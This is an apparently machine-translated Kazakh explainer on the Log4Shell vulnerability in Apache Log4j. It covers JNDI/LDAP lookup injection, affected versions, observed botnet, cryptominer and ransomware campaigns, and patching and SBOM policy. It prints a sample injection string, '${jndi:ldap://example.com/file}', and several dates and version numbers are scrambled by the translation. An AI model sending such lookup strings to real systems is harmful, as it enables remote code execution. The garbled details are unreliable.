Мазмұны[Жасыру][Көрсету]
2021 жылдың қараша айының соңында біз киберқауіпсіздікке үлкен қатер төнгенін анықтадық. Бұл эксплуатация бүкіл әлем бойынша миллиондаған компьютерлік жүйелерге әсер етуі мүмкін.
Бұл Log4j осалдығы және назардан тыс қалған дизайн ақауы әлемдегі компьютерлік қызметтердің 90%-дан астамы шабуылға қалай ашық болатыны туралы нұсқаулық.
Apache Log4j — Apache Software Foundation әзірлеген ашық бастапқы Java негізіндегі журнал жүргізу утилитасы. Бастапқыда 2001 жылы Ceki Gülcü жазған, ол қазір Apache Software Foundation жобасының Apache Logging Services бөлігі болып табылады.
Дүние жүзіндегі компаниялар өздерінің қолданбаларына кіруді қосу үшін Log4j кітапханасын пайдаланады. Шын мәнінде, Java кітапханасы өте кең таралған, оны Amazon, Microsoft, Google және т.б. қолданбалардан табуға болады.
Кітапхананың танымалдылығы кодтағы кез келген ықтимал ақаулық миллиондаған компьютерлерді бұзуға ашық қалдыруы мүмкін екенін білдіреді. 24 жылдың 2021 қарашасында А бұлтты қауіпсіздік Alibaba үшін жұмыс істейтін зерттеуші қорқынышты кемшілікті тапты.
Log4j осалдығы, сонымен қатар Log4Shell деп те белгілі, 2013 жылдан бері байқалмай тұрды. Бұл осалдық зиянды әрекеттерге Log4j жұмыс істейтін зардап шеккен жүйелерде кодты іске қосуға мүмкіндік берді. Ол 9 жылдың 2021 желтоқсанында көпшілікке жарияланды
Сала мамандары Log4Shell кемшілігін деп атайды соңғы жадтағы ең үлкен осалдық.
Осалдық жарияланғаннан кейінгі аптада киберқауіпсіздік топтары миллиондаған шабуылдарды анықтады. Кейбір зерттеушілер тіпті минутына жүзден астам шабуыл жылдамдығын байқады.
Бұл қалай жұмыс істейді?
Log4Shell неге соншалықты қауіпті екенін түсіну үшін оның не істей алатынын түсінуіміз керек.
Log4Shell осалдығы кодты еркін орындауға мүмкіндік береді, бұл негізінен шабуылдаушы мақсатты компьютерде кез келген пәрменді немесе кодты іске қоса алатынын білдіреді.
Мұны қалай жүзеге асырады?
Біріншіден, біз JNDI деген не екенін түсінуіміз керек.
Java атаулары мен каталогтар интерфейсі (JNDI) Java бағдарламасына атау арқылы деректер мен ресурстарды табуға және іздеуге мүмкіндік беретін Java қызметі болып табылады. Бұл каталог қызметтері маңызды, себебі олар қолданбаларды жасау кезінде әзірлеушілерге оңай сілтеме жасау үшін ұйымдастырылған жазбалар жинағын қамтамасыз етеді.
JNDI белгілі бір каталогқа кіру үшін әртүрлі протоколдарды пайдалана алады. Осы хаттамалардың бірі жеңіл салмақты каталогқа кіру протоколы немесе LDAP болып табылады.
Жолды тіркеу кезінде, log4j пішіннің өрнектері кездескен кезде жолды ауыстыруды орындайды ${prefix:name}
.
Мысалға, Text: ${java:version}
Мәтін ретінде тіркелуі мүмкін: Java нұсқасы 1.8.0_65. Мұндай ауыстырулар әдеттегідей.
сияқты өрнектер де болуы мүмкін Text: ${jndi:ldap://example.com/file}
LDAP протоколы арқылы URL мекенжайынан Java нысанын жүктеу үшін JNDI жүйесін пайдаланады.
Бұл URL мекенжайынан келетін деректерді құрылғыға тиімді жүктейді. Кез келген әлеуетті хакер зиянды кодты жалпы URL мекенжайында орналастыра алады және Log4j пайдаланатын машиналар оны тіркеуді күтеді.
Журнал хабарларының мазмұнында пайдаланушы басқаратын деректер болғандықтан, хакерлер өздері басқаратын LDAP серверлеріне нұсқайтын өздерінің JNDI сілтемелерін кірістіре алады. Бұл LDAP серверлері JNDI осалдық арқылы орындай алатын зиянды Java нысандарына толы болуы мүмкін.
Мұны нашарлататын нәрсе - бұл қолданба серверлік немесе клиенттік қолданба екені маңызды емес.
Тіркеуші үшін шабуылдаушының зиянды кодын оқуға мүмкіндік бар болса, қолданба әлі де эксплуатацияларға ашық.
Кім әсер етті?
Осалдық 4 және 2.0 нұсқасын қоса алғанда, APache Log2.14.1j пайдаланатын барлық жүйелер мен қызметтерге әсер етеді.
Бірнеше қауіпсіздік сарапшылары осалдық Java қолданатын бірқатар қолданбаларға әсер етуі мүмкін деп кеңес береді.
Кемшілік алғаш рет Microsoft корпорациясына тиесілі Minecraft бейне ойынында анықталды. Майкрософт кез келген қауіпке жол бермеу үшін пайдаланушыларды Java шығарылымы Minecraft бағдарламалық құралын жаңартуға шақырды.
Джен Истерли, Киберқауіпсіздік және инфрақұрылымдық қауіпсіздік агенттігінің (CISA) директоры жеткізушілерде үлкен жауапкершілік соңғы пайдаланушылардың осы осалдықты пайдаланатын зиянкестердің алдын алу үшін.
«Жеткізушілер сонымен қатар соңғы пайдаланушыларға олардың өнімінде осы осалдық бар екенін білуі және бағдарламалық құрал жаңартуларына басымдық беруі үшін тұтынушыларымен байланыста болуы керек».
Шабуылдардың басталып кеткені хабарланды. Киберқауіпсіздік бағдарламалық құралын ұсынатын Symantec компаниясы шабуыл сұрауларының әртүрлі санын байқады.
Мұнда зерттеушілер анықтаған шабуыл түрлерінің кейбір мысалдары берілген:
- Ботнеттер
Ботнеттер – бір шабуылдаушы тараптың бақылауындағы компьютерлер желісі. Олар DDoS шабуылдарын жасауға, деректерді ұрлауға және басқа да алаяқтыққа көмектеседі. Зерттеушілер Muhstik ботнетін Log4j эксплойтінен жүктелген қабық сценарийлерінде байқады.
- XMRig Miner троян
XMRig - бұл Monero токенін өндіру үшін процессорларды пайдаланатын ашық бастапқы криптовалютаны өндіруші. Киберқылмыскерлер XMRig қолданбасын адамдардың құрылғыларына орната алады, осылайша олар өздерінің өңдеу қуатын білместен пайдалана алады.
- Khonsari Ransomware
Ransomware зиянды бағдарламаның нысанын білдіреді файлдарды шифрлау компьютерде. Содан кейін шабуылдаушылар шифрланған файлдарға кіруге рұқсат беру үшін төлемді талап ете алады. Зерттеушілер Log4Shell шабуылдарында Khonsari төлем бағдарламалық құралын тапты. Олар Windows серверлеріне бағытталған және .NET құрылымын пайдаланады.
Бұдан кейін не болады?
Сарапшылардың болжауынша, Log4J осалдығы тудырған хаосты толығымен жою үшін айлар немесе тіпті жылдар қажет болуы мүмкін.
Бұл процесс әрбір зақымдалған жүйені патч нұсқасымен жаңартуды қамтиды. Осы жүйелердің барлығы патчталған болса да, серверлер шабуыл үшін ашық терезеге хакерлер әлдеқашан қосып қойған ықтимал бэкдорлардың қаупі әлі де бар.
көптеген шешімдер мен ықпал ету шаралары қолданбалардың осы қате арқылы пайдаланылуын болдырмау үшін бар. Жаңа Log4j 2.15.0-rc1 нұсқасы осы осалдықты азайту үшін әртүрлі параметрлерді өзгертті.
JNDI қолданатын барлық мүмкіндіктер әдепкі бойынша өшіріледі және қашықтан іздеулер де шектелген. Log4j орнатуыңызда іздеу мүмкіндігін өшіру ықтимал эксплуатациялар қаупін азайтуға көмектеседі.
Log4j-тен тыс, ашық бастапқы эксплуаттардың алдын алу үшін әлі де кеңірек жоспар қажет.
Мамыр айының басында Ақ үй мәлімдеме жариялады бұйрық ұлттық киберқауіпсіздікті жақсартуға бағытталған. Ол негізінде қосымшаны құруға қажетті әрбір элементтің тізімін қамтитын ресми құжат болып табылатын бағдарламалық қамтамасыз ету материалдарының тізімі (SBOM) туралы ережені қамтыды.
Бұл сияқты бөліктерді қамтиды ашық бастапқы әзірлеу үшін пайдаланылатын пакеттер, тәуелділіктер және API интерфейстері. SBOM идеясы ашықтық үшін пайдалы болғанымен, ол тұтынушыға шынымен көмектеседі ме?
Тәуелділіктерді жаңарту тым көп қиындық тудыруы мүмкін. Компаниялар балама пакеттерді табу үшін қосымша уақытты жоғалтуға тәуекел етпей, кез келген айыппұлдарды төлеуді таңдай алады. Мүмкін, бұл SBOMs тек егер олар болса ғана пайдалы болады ауқымы одан әрі шектеледі.
қорытынды
Log4j мәселесі ұйымдар үшін жай ғана техникалық мәселе емес.
Бизнес көшбасшылары олардың серверлері, өнімдері немесе қызметтері өздері қолдамайтын кодқа сүйенген кезде туындауы мүмкін ықтимал тәуекелдерді білуі керек.
Ашық бастапқы және үшінші тарап қолданбаларына сену әрқашан белгілі бір тәуекелді тудырады. Компаниялар жаңа қауіптер пайда болғанға дейін тәуекелдерді азайту стратегияларын әзірлеуді қарастыруы керек.
Интернеттің көп бөлігі бүкіл әлем бойынша мыңдаған еріктілер қолдайтын ашық бастапқы бағдарламалық құралға сүйенеді.
Егер біз интернетті қауіпсіз жерде сақтағымыз келсе, үкіметтер мен корпорациялар ашық бастапқы кодты және киберқауіпсіздік агенттіктерін қаржыландыруға инвестиция салуы керек. CISA.
пікір қалдыру